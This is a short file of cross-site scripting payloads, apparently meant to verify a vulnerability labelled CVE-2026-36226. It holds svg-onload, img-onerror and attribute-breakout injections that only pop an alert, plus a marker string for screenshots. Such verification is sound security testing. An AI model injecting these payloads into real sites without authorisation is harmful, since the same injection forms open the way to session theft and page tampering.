# CVE-2026-36226 benign XSS verification payloads

# Basic proof-of-execution payload:
"><svg/onload=alert("CVE-2026-36226")>

# HTML context payload:
<img src=x onerror=alert("CVE-2026-36226")>

# Attribute-breakout payload:
" autofocus onfocus=alert("CVE-2026-36226") x="

# Script-context-safe marker string for screenshots:
CVE-2026-36226-XSS-VERIFICATION

